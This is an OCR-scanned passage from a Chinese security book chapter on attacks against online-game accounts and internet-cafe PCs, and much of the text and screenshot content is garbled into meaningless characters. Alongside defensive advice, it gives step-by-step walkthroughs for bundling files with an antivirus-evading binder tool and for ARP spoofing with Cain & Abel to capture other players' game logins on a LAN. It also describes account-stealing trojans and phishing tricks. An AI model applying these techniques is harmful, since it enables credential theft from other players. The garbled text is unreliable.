| ii i 
二 

| 
rr er 


| 
F 
| 国 ,im ness 4 
四 了] as 


Er 


i ee 

| pr a 
| CE 
| 轴 9 
| 硬 Eeass 中 
| 
| 本 TY 
EE TT ep 
| rs 而 可由 
Ea had se TE EE 
Eres we 
| PP 
国 和 
| yet wre 


| an, te 


[i ia 过 -HL 


LU, SIRYICE 
= 

两 T 本 全 FEL 
Ea cid- 

LE STNYTCE 
LL SEBTCE 


阐 秀 EE : dy 画 全 ii 二 ET 中 说 | - 草 尘 午 项 军 Er 


右 击 进程 选项 , 从 快捷 菜单 中 可 以 进行 一 系列 操作 ， 
单 击 “ 查 看 属性 ”命令 。 


STEP06: 


系统 信息 设置 


和 过 飞 基 区 陀 二 轩 站 | 弄 机 自动 进行 辣 亩 口 和 要 起 


吕 第 时 名 
让 知 吉 上 


有 


二 


摘 坟 : 


Wimdows 会 话 管 理 器 


位 置 : 
六 小 : 


C: WINDOWS\ system32 
B85.0 WB 9,632 字 节 ) 


占用 空间 : 


68.0 到 (9,632 字 节 ) 


创建 时 间 : 
修改 时 间 : 


2013 年 4 月 0 日 38:52:09 
2013 年 3 月 19 日 ， 10:49:16 


查看 属性 信息 。 
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| 证 生动; 时 晤 jE 内 在 f 乔 醒 柄 i 列 . 二 505599 - 才 便 而 新 让 29089-6F- 苛 


Gopi 


在 “系统 信息 ”选项 卡 中 可 查看 系统 的 有 关 信 息 , 并 
可 以 监视 内 存 和 CPU 的 使 用 情况 。 


网 游 与 网 吧 攻 防 


由 于 网 吧 是 面向 社会 公众 开放 的 营利 性 网 络 服务 场所 ， 用 户 可 利用 网 吧 进 
行 网 页 汶 | 览 ,、 网 游 、 聊天 、 听 音 乐 或 其 他 活动 。 针对 网 吧 的 这 一 特点 ， 一 些 黑 

客 在 网 吧 中 植 入 木马 ， 以 等 待 并 窃取 下 一 位 使 用 该 计算 机 的 用 户 账 号 和 密码 等 
六 和 < 

O 网游 盗号 木马 曝光 

O 解读 网 站 充值 其 骗术 

O 游戏 账号 破解 与 防范 

O 警惕 局 域 网 监听 

O 美 萍 网 管 大 师 


客 过 
PE 工具 人 攻 了 


6.1 ”网游 盗 号 木马 曝光 


菏 些 网 游 盗 写 木马 可 以 盗 取 多 球 网 络 游 戏 的 账号 密码 信息 ， 这 类 病毒 文件 运行 后 会 衍 
生 相 关 文 件 全 系统 目录 下 ,并 修改 注册 表 和 生成 司 动 项 ,通过 注入 进程 可 以 设置 消息 监视 
截获 用 户 的 账 吕 资料 并 发 送 到 木马 种 植 者 指定 的 位 置 ， 更 有 一 此 次 号 木马 会 把 游戏 账号 里 
的 装备 信息 记录 下 来 一 起 发 送 给 木马 种 植 者 。 


0.1.1 捆 绪 盗号 木马 曝光 


在 网 络 游戏 中 ， 一些 游 戏 外 挂 、 游 戏 插件 和 游戏 客户 Wd 
起 。 使 用 这 些 程 序 的 人 多 数 是 玩 网 络 游 戏 的 人 ， 因 此 盗 取 网 络 游 戏 的 账号 和 密码 信息 
ee hoe nt am om nai 
为 图 片 和 Flash 文件 不 需要 用 户 男 外 执行 ， 只 要 打开 束 可 以 运行 ， 一旦 用 户 浏 览 了 捆绑 
了 木马 的 图 片 和 Flash 文件 ， 系 统 束 会 中 毒 。 网 络 上 存在 有 很 多 捆绑 工具 ， 如 永 不 查 杀 
的 捆绑 机 。 

下 面 曝光 使 用 “ 永 不 查 杀 的 捆绑 机 ”工具 进行 文件 捆绑 的 过 程 ， 具 体 的 操作 步骤 
a es 


STEP01: 打开 “水 不 查 杀 的 捆绑 机 ” STEP02: 选择 要 捆绑 的 文件 


可 未 乎 凋 条 的 捆 纤 机。 Wec 1.1  ( 瑟 询 子 工 作 富 ) 国 四 必 增加 要 捆 卷 的 立 件 


mm 


安装 首次 运行 : | =] 当 首 次 结束 再 运行 : [全 cna》 = | 
窗口 运行 状 夸 : ”2 "| 所 禾 立 件 2 


哥 过 洱 守信 
命 只 和希 
We 


单 击 “ 增 加 文件 ”按钮 。 选择 要 捆绑 的 文件 ， 此 捆绑 程 ” 圈 单 击 “ 打 
序 支持 各 种 类 型 的 文件 格式 。 开 ” 按 钮 。 
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网 游 与 网 吧 攻 防 


STEP03: 返回 主 窗口 STEP04: 再 添加 一 个 应 用 程序 
过 未 平 查 和 的 质 针 机 Yer 1.1  (《 友 的 子 工作 室 ) 同 | 呵 未 在 查 时 的 捆 针 机 Ver 1.1 【世间 子 工作 室 ) 


| \ 和 建立 是 更 We 二 
H: 市 建 友人 忻 坎 AStrem2009， exe 


| “人 用 说 明 


安装 首 饮 运行 辕 | 当 首 次 关 束 再 运行 : | =| 


查看 已 添加 的 应 用 程序 。 在 “安装 首次 运 攻 
行 " 下 拉 列 表 中 选择 rn exe” 
“Strom2009.exe ” 选项 。 
选项 。 


STEP05: 为 捆绑 文件 选择 图 标 STEP06: 保存 捆绑 文件 


二 永 不 杏 杀 的 捆 嘟 机 “Yer 1. 1 【其 航 子 工作 室 ) 
候 存 在 (L): [[ 村 店面 


要 壬 纯 的 立 忻 
和 旺 建 宽 件 办 Nena ee 
可 建交 伴 实 VStr om2008. exe 


安装 首 忱 运行 : Bren2n0n. “x =| 当 首 达 辕 事 再 运行 : ran =| 
贸 口 运行 状 邦 : | 是 议 =| | 


网 单 击 “保存 ”按钮 , 即 
”可 进行 文件 捆 统 。 


待 捆 绑 结束 后 ， 提 示 “ 捆 绑 完 成 ! , 单 击 “ 确 定 ” 


司 六 耐久 co i 局 : 按钮 ， 完 成 文件 的 捆绑 操作 。 
仿 司 是 口 准 国 尖 半 公 入 


i, bai EE Tt 
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客 过 
.区 -工具 攻 了 


“ 永 不 查 杀 的 捆绑 机 ”除了 支持 常见 的 图 标 图 片 文 件 (*.JOC、*.BMP ) 外 ， 
还 支持 从 可 执行 文件 (*.EXE ) 和 动态 链接 库 (*.DLL ) 中 提取 相关 的 图 标 。 由 


于 该 工具 是 利用 模拟 更 程序 来 支持 多 个 不 同类 型 的 文件 捆绑 成 一 个 可 执行 程 
序 ， 因 此 一 般 的 杀毒 工具 都 不 会 报警 ， 从 而 躲 开 了 杀毒 软件 的 查 杀 。 


62 哪些 网 游 账号 容易 被 次 


目前 网 络 游 戏 已 经 成 为 很 多 人 的 男 一 个 世界 ， 网 络 游戏 中 的 很 多 装备 甚至 级 别 高 的 账 
写本 身 也 成 为 玩家 的 财产 ， 在 现实 世界 中 也 可 以 用 现金 来 进行 交易 。 于 是 ， 一 些 不 法 之 徒 
开始 盯 上 网 络 游戏 ， 通 过 盗 取 网 络 游戏 的 账号 来 牟取 不 当 之 财 。 

以 下 几 种 网 络 游戏 账号 最 容易 被 盗 。 

(1) 有 价值 的 账号 

账 豆 的 等 级 越 高 或 网 络 游戏 中 的 人 物 装备 越 好 ， 其 价值 束 越 高 。 如 果 是 新 申请 的 账号 ， 
即使 账号 被 盗 ， 玩 家 也 不 会 在 意 。 

(2) 在 网 吧 或 公共 场合 玩 网 络 游戏 的 账号 

由 于 这 种 场合 的 计算 机 谁 都 能 用 ， 这 直接 为 盗号 者 提供 了 方便 。 

(3) 网 游 账 号 公用 

很 多 玩 网 游 的 人 喜欢 几 个 人 共用 一 个 号 ， 因 为 这 样 升级 比较 快 ， 但 是 这 样 束 增加 了 账 
写 被 盗 的 可 能 性 ， 只 要 这 些 人 中 有 一 个 人 的 机 器 中 了 盗号 木马 , 游戏 账号 束 很 有 可 能 被 盗 。 

目前 常见 的 网 游 盗 号 木马 有 如 下 几 种 。 

1) NRD 系列 网 游 鳃 贼 。NRD 系列 网 游 般 贼 是 一 短 典 型 的 网 游资 号 木马 ， 通 过 各 种 
木马 下 载 器 进入 用 户 计 算 机 ， 利 用 键盘 钩子 等 技术 盗 取 “地 下 城 与 勇士 ”魔兽 世界 ”“ 传 
奇 世 界 ” 等 多 款 热 门 网 游 的 账号 和 密 但 ， 还 可 对 受害 用 户 的 计算 机 进行 屏幕 截图 、 窃 取 
用 户 存 储 在 计算 机 上 的 图 片 文档 和 文本 文档 ， 以 此 破解 游戏 密 保 卡 ， 并 将 这 些 敏感 信息 
发 送 到 指定 邮箱 中 。 

2) 碎 兽 密 保 死 星 。 该 次 号 木马 是 将 目 己 伪 闭 为 游戏 ,针对 热门 网 游 “魔兽 世界 ”游戏 。 
该 游戏 会 把 正常 的 wow.exe 改名 后 设置 为 隐 洗 文件 ， 木 马 却 以 wow.exe 名 称 出 现在 玩家 面 
前 。 如 果 玩 家 不 小 心 运行 了 木 蕊 ， 即 使 账号 绑 定 了 密码 保护 卡 ， 游 戏 账号 也 会 被 盗 取 。 

3) 密 保 卡 盗 镭 器 。“ 密 保 卡 盗 鳃 占 ” 是 一 球 针 对 网 游 密 保 卡 的 盗号 木 蕊 。 它 会 尝试 搜 
寻 并 盗 取 用 户 存放 于 计算 机 中 的 网 游 密 保 卡 ， 一 旦 成 功 ， 将 最 终 导 人 致 游戏 账号 被 盗 。 

4) 下 载 狗 变 种 。“ 下 载 狗 变 种 ”是 一 个 木马 下 载 融 。 利 用 该 工具 可 以 下 载 一 些 网 游 盗 
导 木 马 和 广告 程序 ， 从 而 给 用 户 造成 虚拟 财产 的 损失 以 及 频 党 的 弹 窗 骚扰 。 


6.2 解读 网 站 充值 欺骗 术 
在 玩 网 络 游戏 过 程 中 ， 有 的 玩家 需要 用 金钱 购买 更 精良 的 装备 ， 这 时 就 需要 在 相应 充 


值 功能 区 使 用 现实 金钱 换取 游戏 中 的 点 数 。 针 对 这 种 情况 ， 一 些 黑 客 就 模拟 游戏 厂商 界面 
或 在 游戏 界面 中 洪 加 一 些 基 有 诱惑 性 的 广告 信息 ， 以 户 惑 用 户 前 往 充 值 ， 从 而 骗取 钱财 。 
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”第 6 章 
网 游 与 网 吧 攻 [ 防 


6:2.1 了 解 欺 骗 的 原理 


游戏 网 站 充值 欺 驴 术 的 原理 和 骗取 网 上 银行 账号 及 密码 信息 的 原理 相似 , 都 是 使 用 
钓鱼 网 站 、 虚 假 广告 等 欺骗 手段 。 比 如 ， 前 段 时 间 出 现 的 非法 网 站 http://www. pay163.com 
和 真实 的 网 易 点 数 卡 充值 查询 中 心 的 网 址 http://pay.163.com， 不 细心 的 玩家 很 容易 上 当 
受骗 。 

还 有 一 些 黑客 伪造 网 游 的 官方 网 站 ， 且 各 个 链接 也 都 能 链接 到 正确 的 网 页 中 ， 但 是 会 
在 主页 中 添加 一 些 虚 假 的 有 奖 信 息 ， 提 示 玩 家 已 经 中 了 大 奖 ， 让 玩家 通过 登录 网 址 了 解 相 
关 的 其 体 细节 以 及 领取 方式 。 竺 玩家 打开 相应 网 址 后 ， 会 提示 输入 填写 账号 、 密 人 码 、 角 色 
等 级 等 信息 ， 一 旦 输入 这 些 资 料 ， 玩 家 的 账号 信息 就 已 经 被 黑客 盗 取 ， 然 后 其 直接 登录 该 
账号 ， 并 转移 此 账号 中 的 喧 重 物品 。 


0.2.2 弟 见 的 期 驴 方 式 


网 络 骗 术 层 出 不 穷 ， 让 人 防不胜防 ， 尤 其 是 在 网 络 游戏 中 ， 一 不 小 心 束 挥 入 了 盗号 者 
布下 的 陷阱 。 所 以 不 要 轻信 任何 非 官 方 网 站 的 表单 提交 程序 ， 一 定 要 通过 正确 的 方式 进入 
网 游 公 司 的 正式 页 面 才 能 确 你 账号 安全 。 黑 客 常 用 的 欺骗 方式 有 如 下 儿 种 。 

1. 冒充 系统 省 理 员 或 工作 人 员 骗 取 账 号 密码 

这 种 方法 比较 单 抑 ， 盗 号 者 一 般 申 请 “网 易 发 奖 员 ”“ 点 卡 验证 员 ” 等 名 字 ， 然 后 发 送 
一 些 虚 假 的 中 奖 信息 。 针 对 这 种 情况 ， 可 以 采取 如 下 儿 种 防范 措施 。 

1) 一 般 在 游戏 中 只 有 一 个 “游戏 管理 员 ” 其 他 任何 管理 员 都 是 假 肯 的 ， 而 且 “ 游 戏 
管理 员 ” 在 游戏 中 一 般 是 不 会 回 用 户 索 取 账 号 和 密码 的 。 

2) 如 果 “ 游 戏 管 理 员 ”有 必要 索取 用 户 的 账号 、 密 码 进行 查询 ， 也 只 会 让 用 户 通 过 客 
服 专区 或 邮件 的 形式 提交 。 

3) 游戏 官方 只 会 在 主页 上 以 公告 的 形式 向 用 户 公布 任何 与 中 奖 有 关 的 信息 ， 而 不 会 在 
游戏 中 。 

4) 如 果 在 游戏 的 过 程 中 友 现 有 人 友 送 类 似 骗 取 账 号 和 密码 的 信息 ， 可 以 蕊 上 癌 在 线 的 
“游戏 管理 员 ” 报 告 ， 或 者 通过 客服 专区 提 和 区 。 

2. 利用 账号 买卖 等 形式 骗取 账号 和 密码 

这 种 方法 是 利用 虚假 的 交易 账号 来 骗取 玩家 的 账号 。 盗 写 者 通常 以 忌 写 为 名 ， 把 号 卖 
给 用 户 ， 但 是 在 得 到 钱 后 又 通过 安全 人 码 找 回 去 ， 或 假 朔 想 购 买 用 户 的 账号 ， 以 看 号 为 名 骗 
取 账 豆 。 其 防范 方法 如 下 。 

1) 拒绝 虚拟 财产 交易 ， 尤 其 是 拒绝 账号 交易 。 

2) 不 要 将 日 己 的 账号 、 和 安全 人 或 密码 轻易 告诉 其 他 玩家 。 

3. 发 送 虚 假 修改 安全 码 信 息 欺 骗 用 户 

盗号 者 通常 会 通过 游戏 频道 同 他 人 发 送 类 似 “ 告 诉 大 家 一 个 好 消 轧 ， 网 易 账 写 系 统 已 
经 被 破解 了 ， 可 以 通过 登录 http://xy2on**.****.com 页 面 修改 安全 人 码 !” 的 通知 。 用 户 一 旦 
登录 访 页 甸 并 输入 目 己 的 账号 和 密 但 等 信息 ， 访 用户 的 这 些 信息 束 会 被 盗号 者 盘 取 。 

该 种 其 驳 方 式 的 防范 方法 如 下 。 
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客 :二 
-工具 人 攻 了 


1) 不 要 轻信 这 些 信息 。 

2) 如 果 要 修改 安全 码 ， 则 一 定 要 到 游戏 开发 公司 的 官方 网 站 上 修改 。 

4. 冒充 朋友 ， 在 游戏 中 索要 用 户 账 号 、 点 卡 等 信息 

该 种 盗号 方式 的 特点 是 : 盗号 者 目 称 是 游戏 中 用 户 的 朋友 或 菜 朋 友 的 “小 号” 然后 便 
称 想 要 看 用 户 的 “极品 ” 装备， 或 帮 用 户 练 级 、 充 值 点 卡 等 ， 从 而 向 其 索要 账号 密码 ; 
而 当 用 户 将 账号 、 密 码 发 给 对 方 后 ， 其 账号 就 会 本 ne 
示 密 但 错 误 。 其 防范 方法 是 不 要 轻易 将 目 己 的 游戏 账 志 和 密码 告诉 他 人 。 


0.2.3 ”提高 防范 意识 


网 络 洲 戏 玩家 提高 安全 防范 意识 是 保证 账 扎 和 密 但 不 被 资 取 的 关键 因素 ， 除 上 述 介绍 
的 防范 措施 外 ， 庆 戏 玩家 还 要 注意 防范 本 地 计算 机 的 网 络 安 全 ， 防 范 木 马 病毒 的 攻击 。 

主要 从 如 下 几 个 方面 者 手 。 

1) 在 下 浏览 器 页 面 中 选择 “工具 ”>“Internet 选项 ” 荣 单 命令 ， 即 可 打开 “JInternet 
选项 ”对 话 框 。 在 “安全 ”选项 卡 中 单 击 “ 目 定义 级 别 ” 按 钮 ， 在 “安全 设置 -Internet 区 
域 ” 对话 框 中 的 “ 重 置 为 ”下 拉 列 表 中 选择 “ 癌 ” 选项 。 单 击 “ 确 定 ” 按 钮 ， 即 可 将 Internet 
的 级 别 设置 为 高 ， 如 下 图 所 示 。 保 持 下 浏览 右 的 “Internet 选项 ”对 话 框 的 “高 级 ”选项 
卡 为 默认 设置 。 


Internet 选项 


| 常规 | 安全 。 | 隐私 -| 内容 | 连接 -| 程序 -| 高级- 设置 


Ei .NET Framework 
选择 一 个 区 域 以 查看 或 更 忌 安 全 讼 “区 hei 
大 禁用 


@ 二 V 9 


Internet 本 地 要 入 他 的 站 HR 加 


ere | 让 点 后 ] 
@ se in 

计 区 域 的 安全 级 别 收 ) 

i 中 到 稿 


辐 提示 
及 .三 T Frumerork 相关 组 件 


中 站 外 全 要 全 内 家 i 


+ 在 重新 启动 你 的 计算 机 后 生效 
回 昌 ri EECT 重 置 自 定义 设置 


= 一 重 置 为 | 重 置 让 
将 所 有 区 域 重 置 为 默读 级 别人 B】 | mg 
中 记 ) 


a 
上 于 EE 
单 击 “ 自 定 义 级 别 ” 按 钮 将 安全 级 别 设置 为 “高 ” 


2) 如 朱 在 网 吧 中 登录 目 己 的 游戏 账号 ， 一 定 注意 网 吧 的 计算 机 上 有 是 个 安 儿 了 记录 键盘 
操作 的 软件 或 本 马 。 在 使 用 网 吧 计 算 机 时 打开 “Windows 任务 常理 右 ” 窗 口 ， 在 其 中 奉 看 
是 人 否 有 来 历 不 明 的 程序 正在 运行 ， 如 下 图 所 示 。 如 有 ， 则 立即 结束 该 程序 任务 。 最 好 在 上 
机 前 先 使 用 木马 检查 工具 扫 朱 一 下 机 需 ， 看 是 否 存 在 木马 程序 ， 并 且 重 局 计算 机 。 
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< 人 第 6 章 
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-加 Windows 任务 管理 器 
文件 (F) ”选项 (0O) 重 看 (V) 帮助 (H) 
| 应 用 程序 | 进程 。 | 服 | 性 能 


用 户 名 


证 
JOLA24, re BE 
soe lod . 3164 


可 显示 所 有 用 户 的 进程 G) | 结束 进程 如 ) | 


| 进程 数 ; 74 CPU 使 用 宰 : 68% ”物理 内 存 : 67% 


查看 是 否 有 来 历 不 明 的 程序 正在 运行 


3) 不 要 安装 和 下 载 一 些 来 历 不 明 的 软件 ,特别 是 外 挂 程序 。 同 时 不 要 随便 打开 来 历 不 
明 信 件 的 附件 。 

4) 在 输入 游戏 账号 和 密码 时 ， 最 好 不 要 使 用 (Enter) 键 和 Tab 键 ， 便 用 错位 输入 法 
或 使 用 “小 键盘 ”和 “密码 保护 ”功能 ， 可 以 防止 计算 机 中 盗号 木 号 的 监视 。 

5) 在 使 用 聊天 软件 时 ， 不 要 随意 接收 不 明文 件 ， 如 末 人 确实 需要 接收 文件 ， 要 立即 进行 
得 毒 再 运行 。 

6) 月 动 Windows 的 目 动 更 狐 程 序 ， 以 确保 所 使 用 的 操作 系统 具备 防御 最 新 木马 的 能 


6.3 ”游戏 账号 破解 与 防范 


使 用 暴力 破解 网 辛 账号 和 密码 即 利用 专门 的 雄 力 破解 密码 工具 进行 破解 ， 这 些 工 具 主 
要 采用 和 纷 举 法 逐个 尝试 并 人 破解 网 游 的 账号 和 和 密码， 虽然 破解 过 程 比 较 绥 慢 ， 但 是 还 是 可 以 
人 破解。 所 以 游戏 玩家 应 该 在 玩 游戏 的 过 程 中 保护 好 目 己 的 账号 和 和 密码， 防止 账号 被 盗 。 


6.3.1 (Cain & Abel 破解 工具 


一 般 的 游戏 登录 界面 都 会 为 用 户 提供 “ 目 动 记 住 密码 ”功能 ， 该 功能 为 用 户 以 后 的 登 
孙 提 供 了 方便 ， 但 同时 也 方便 了 黑客 破解 账 吕 和 密码 。 如 采用 户 登 录 网 络 诉 戏 时 使 用 该 功 
能 ， 计 算 机 束 会 目 动 将 其 账号 和 密 公 保存 在 一 个 文件 中 ， 这 样 束 可 以 使 用 雄 力 人 破解 工具 瞬 
间 盗 取 其 账号 和 密码 。 目 前 这 类 人 破解 工具 很 多 ， 如 Cain & Abel 人 破解 工具 。 

Cain 久 Abel 是 一 个 可 以 破解 屏保 密码 、PWL 密码 、 共 享 密码 、 缓 存 口 令 、 远 程 共享 
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7 = > 
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口令 、SMB 口令 等 的 综合 


工具 。 利 用 该 工具 可 以 合 看 使 用 “ 目 动 记 住 密码 ” 功 外 


EE 登录 的 本 


地 账户 及 密码 。 下 面 通过 Cain & Abel 软件 来 具体 介绍 使 用 “ 目 动 记 住 密码 ”功能 给 用 户 带 
来 的 危害 性 。 具 体 的 使 用 操作 步 


打开 “Cain” 主 窗口 


邓 如 下 。 
STEP01: 


变 件 是 ) 查看 (0 院 置 必 工具 林 ) 晴 盈 各 
|e Ee 小 El 


双击 桌面 的 “配置 ”按钮 
上 的 "Cain" 快捷 图 标 , 打开 “Cain” 吧 |。 
主 窗口 。 


提示 安装 Winpcap4.1， 


STEP03: 和 返回 “Cain” 主 窗 口 


况 坟 年 ) 草 看 后 且 要 和 工具 在 ) 性 网 人 
EL 证 贡 和 


ER 【工人 EF 加 | 


i 下 让 


单 击 “ 响 探 器 ”， 查 
看 本 地 网 络 中 的 主机 。 


址 ”命令 。 
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STEP02: 打开 “配置 对 话 框 ”对 话 框 


challenge 欺骗 “| ”过 湖 与 端口 | HTTP 表 | 追踪 路 由 | 
了 咱 探 器 | AFR ( hrp Foison Routing ) | 


1 1866.0. 99 
0.0.0.0 


PEas 
CEDevice\HPF_{6658E... 

| "Dewice\HPF Generi... 
Winpeap 版 本 | 

4.1.0. 1753 
当前 同 结 适 配器 

| 铝 ewieeANFF_{6658E0DS-1ED4-48BT1-B1DC-44BF9B121A79] | 


警 肖 141 只 支持 以 太 网 适配器 . 


十 选项 
| 厂 系统 启动 时 开始 嗅 探 ” 厂 不 使 用 漫 杂 模式 
| 厂 系统 自动 时 开始 AR 


STEP04: 打开 “MAC 地 址 扫描 ”对 话 框 


一 罩 #= 浅 林 | 
| 是 | 


留 在 列表 中 右 击 并 图 选择 扫描 的 目标 
选择 “扫描 MAC 地 ”主机 。 


ee 所 有 在 于 网 的 主机 


混乱 醒 式 扫描 
厂 ABP 测试 ( 尾 播 31- 位 ) 
三 AEP 测试 (传播 16- 位 ) 


厂 AEP 测试 ! 懂 播 8- 位 ) 

五 MBP 测试 汾 钥 位 ) 

「 AEF 测试 人 喀 点 情 播 分 组 0) 
厂 AEP 测试 ( 营 点 传播 仙 蛆 1) 
厂 AEP 训 试 (过 点 传播 仙 组 3) 
厂 所 有 测试 


网 单 击 “确定 ”按钮 。 


< 6 章 
网 游 与 网 吧 攻 防 


LE 单 击 “ 咒 探 器 ” STEP06: 查看 已 经 存在 的 ARP 欺骗 


走 粳 旦 ) 查看 定 ) 本 置身) 工具 入} 内 助 0 


2 妆 检 配置 恰 ) 工具 民 ) 性 助 刷 ) 
= re -全 


PE ER 
MS 1 166.1.1 0 有 10EDE4 了 1 总 
有 


33s! 加 1 EST oiedBi : i 
这) 


机 0 | 


EE TE ET CT ET EE ENC 


2 | 一 | 


查看 整个 局 域 网 内 所 有 主机 的 信息 。 国 在 “cain" 主 窗 区 可 看 到 已 经 园 在 空 和 处 单 
口 底部 单 击 "APR” 存 在 的 ARP 欺 击 , 单 击 "添加 
标签 国 。 骗 。 到 列表 " 按钮 

二 

STEP07: 选择 网 关 和 IP 地 址 STEP08: 返回 “APR” 选 项 卡 


是 的 ARE Poiseorn Rowutine 


HEALIEL SIIDURUCTORC- ， 
FEALTEE SEODURNILTOE EC . 


冯 料 在) 于 看 部 配置 加， 工具 1 重负 邮 


警世 111 
EE ED 习 记 二 守山 十 定时 司 ESWE 他国 慰 画 大 让 过 昌 司 有 剧 
反手 下 下 量 晴 过 在 左 壕 惠 玉 所 造 的 主机 和 右 壹 拥有 进 皖 前 [ 主 机 杂 潭 ,在 由 后 犁 ， 

站 六 1 本 i i El 和 | 耐 信 的 让 | 


让 eh, 3 


ry WE 
1 ee 1 县 I 
O01FCaLEFML 
OO1LESEITEOTT 
1SSeSATard 
EUBbPT 
ENC 
LU 
4 : [| 
WOlEFLSSSDFF 人 .B OlESC1T7RSE 
DECOIS Es . 六 1 旺 况 是 TEI 
MTRTWTTINEEET. Pe TTTTAAFNMTRR A 


在 左 侧 列表 中 选 网 关 ， 查看 刚 添加 的 ARP 欺 骗 信 息 。 

右 侧 列表 中 选择 被 欺骗 的 

IP 地 址 。 

STEPO9: “打开 网 站 地 址 栏 STEP10: 返回 “Cain” 主 窗口 


宽 融 是) 至 硬 的 配置 量 ) 工具 可 1 锋 的 孝 } 


Ts 十 村 | 网 Raed ela ge ed lo 间隔 帮 


EET -一 一 


IE 二 调戏 


输入 http:Wpopkart,tiancity. 单 击 “HTTP" 选项 ， 
com/homepage/ ,打开 跑 跑 卡 。 和 密码 ， 单 击 可 看 到 目标 主机 游戏 登 
丁 车 游戏 登录 界面 。 “确定 ”按钮 。 录 的 用 户 名 和 密码 。 
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Pe > 
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全 人 人 他 

使 用 Cain& Abel 软件 可 以 很 轻松 地 贸 取 到 目标 主机 登录 的 网 络 游戏 账号 和 密友。 除 
此 之 外 ， 该 工具 还 可 以 用 来 暴力 破解 账号 和 密码 。 该 工具 的 嗅 探 功能 也 很 强大 ， 几 乎 可 
以 捕获 到 FTP、HTTP、IMAP、POP3、SMB 、TELNET、VNC、TDS、SMTP 等 多 种 账 
号 的 口令 。 


0.3.2 ” 防 汽 指 施 


为 防止 目 己 登录 的 游戏 账号 与 密码 被 黑客 暴力 人 破解， 一 般 须 采取 如 下 儿 种 防御 措施 。 

1) 尽量 不 要 将 目 己 的 游戏 账号 和 密码 到 圳 在 公共 场合 和 其 他 网 站 ， 更 不 要 使 用 “ 目 动 
记 住 密码 ”功能 登录 游戏 。 

2) 尽 可 能 将 密码 设置 得 复杂 一 些 ， 位 数 最 少 在 8 位 以 上 ， 且 需要 数 子 、 字 母 和 其 他 子 
符 混 合 使 用 。 

3) 不 要 使 用 如 生日 、 映 份 证 号码 、 电 话 写 个 、 居 住 的 街道 名 称 、 门 牌号 人 码 等 与 日 己 相 
关 的 信息 作为 游戏 的 密 公 。 

4) 由 于 再 复杂 的 密码 也 可 人 被 汗 客 破 解 ， 只 有 经 第 更 换 密码 才 可 提 局 密码 安全 系数 。 

5) 要 申请 密码 你 护 ， 即 设置 安全 个， 而 且 安 全 公 不 要 与 密码 相同 。 由 于 安全 公 也 不 能 
保证 密码 不 被 破解 ， 所 以 用 户 在 设置 好 安全 码 后 ， 还 要 尽 可 能 地 你 护 目 己 的 密码 。 

6) 完 普 的 用 户 登 录 权 限 和 软件 安 儿 权限 ,并 尺 可 能 地 使 用 一 些 锁 定 软件 在 短暂 离开 时 
锁定 计算 机 ， 避 免 其 他 人 非法 使 用 目 己 的 计算 机 。 


6.4 “警惕 局 域 网 监听 


目前 ， 局 域 网 中 多 采用 广播 方式 ， 在 广播 域 中 可 以 监听 到 所 有 的 信息 报 。 这 样 在 局 域 
网 中 进行 网 络 游戏 时 ， 黑 客 吏 可 以 通过 对 信息 包 的 分 析 来 盘 取 局 域 网 上 传输 的 一 些 诉 戏 账 
号 和 密码 信息 。 同 时 ， 现 在 很 多 黑客 都 会 把 局 域 网 扫描 与 监听 作为 入 侵 之 前 的 准备 工作 。 
攒 借 这 种 方式 ， 黑 客 可 以 获得 用 户 名 、 黎 码 等 重要 的 信息 ， 还 可 以 监听 别人 发 送 的 邮件 内 
容 、 即 时 聊天 信息 、 访 问 网 页 的 内 容 等 。 因 此 ， 如 末 被 黑客 监听 ， 可 能 会 给 企业 市 来 巨大 
的 损失 ， 所 以 要 去 惕 局 域 网 的 监 昕 。 


0.41 了 解 监 听 的 原理 


网 络 监听 是 一 种 管理 计算 机 网 络 安全 方面 的 技术 ， 其 主要 的 使 用 对 象 是 网 络 安 全 管理 
人 员 。 他 们 利用 该 项 技术 来 监视 网 络 的 状态 、 数 据 流动 情况 以 及 网 络 上 传输 的 信息 等 。 当 
吝 居 以 明文 的 形式 在 网 络 上 传输 时 , 使 用 监听 技术 接收 网 络 上 传输 的 信息 并 不 是 一 件 难 事 ， 
只 要 将 网 络 接口 设置 成 监听 模式 ， 即 可 将 网 上 传输 的 信息 截获 。 

对 于 现在 普 轴 使 用 的 以 太 网 协议 ， 其 工作 方式 是 将 要 发 送 的 数据 包 发 往 连 接 在 一 起 的 
所 有 主机 ， 且 数据 包 中 包含 者 应 该 接收 数据 包 主 机 的 目标 地 址 ， 只 有 与 数据 包 中 目标 地 址 
一 致 的 那 全 主机 才能 接收 。 当 主机 工作 在 监听 模式 下 ， 无 论 数 据 包 中 的 目标 地 址 是 什么 ， 
主机 都 将 接收 并 一 律 上 交 给 上 层 协 议 软 件 处 理 ， 这 也 就 意味 着 在 同一 条 物理 信道 上 传输 的 
所 有 信息 都 可 以 被 接收 到 。 如 末 被 接收 到 的 信息 是 以 明文 发 送 的 ， 则 其 中 所 有 的 信息 都 将 
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人 大 多 是 以 明文 发 送 的 。 如 果 用 户 的 账户 名 和 口 

等 信息 也 以 明文 的 方式 在 网 上 传输 ， 而 此 时 一 个 黑客 或 网 络 攻 击 者 正在 进行 网 络 监 听 ， 
后 果 不 坟 ; 役 想 ， 这 也 是 目前 网 上 交易 的 账号 密码 丢失 、QQ 号 丢失 的 原因 所 在 。 

目前 对 网 络 游戏 进行 监听 的 工具 主要 有 联众 密码 监听 器 和 边锋 密码 监听 器 ， 这 两 个 工 
具 专 门 用 来 监视 局 域 网 内 部 联众 和 边锋 网 络 游戏 登录 ， 同 时 记录 整个 局 域 网 内 部 的 联众 网 
页 登录 、 边 锋 网 页 登录 等 包括 账户 和 密码 在 内 的 所 有 敏感 信息 。 对 于 登录 到 游戏 大 厅 的 用 
户 可 以 记录 账号 和 密码 ， 而 对 于 登录 到 游戏 网 页 的 则 可 以 记录 用 户 在 网 页 I 中 输入 的 所 有 以 
POST 方式 提交 的 表单 中 的 全 部 内 容 ， 而 且 只 要 有 一 个 客户 问 运 行 了 此 类 工具 ， 整 个 网 吧 
或 局 域 网 就 都 在 其 监控 之 下 。 


60.4.2 ”密码 防盗 工具 


对 于 黑客 来 说 ， 可 以 利用 网 络 监 昕 拷 术 很 容易 地 获得 用 户 账号 和 密码 等 关键 信息 ; 而 
对 于 入 侵 检 测 和 追踪 者 来 说 ， 网 络 监听 技术 又 能 够 在 与 黑客 的 斗争 中 发 挥 重要 的 作用 。 因 
此 ， 目 前 在 局 域 网 中 还 没有 很 好 的 方法 来 防御 此 类 监听 ， 但 也 并 不 是 对 恶意 的 网 络 监听 攻 
击 无 任何 防 苑 措施 。 下 面 将 介绍 儿 种 防范 网 络 监 听 的 方法 。 

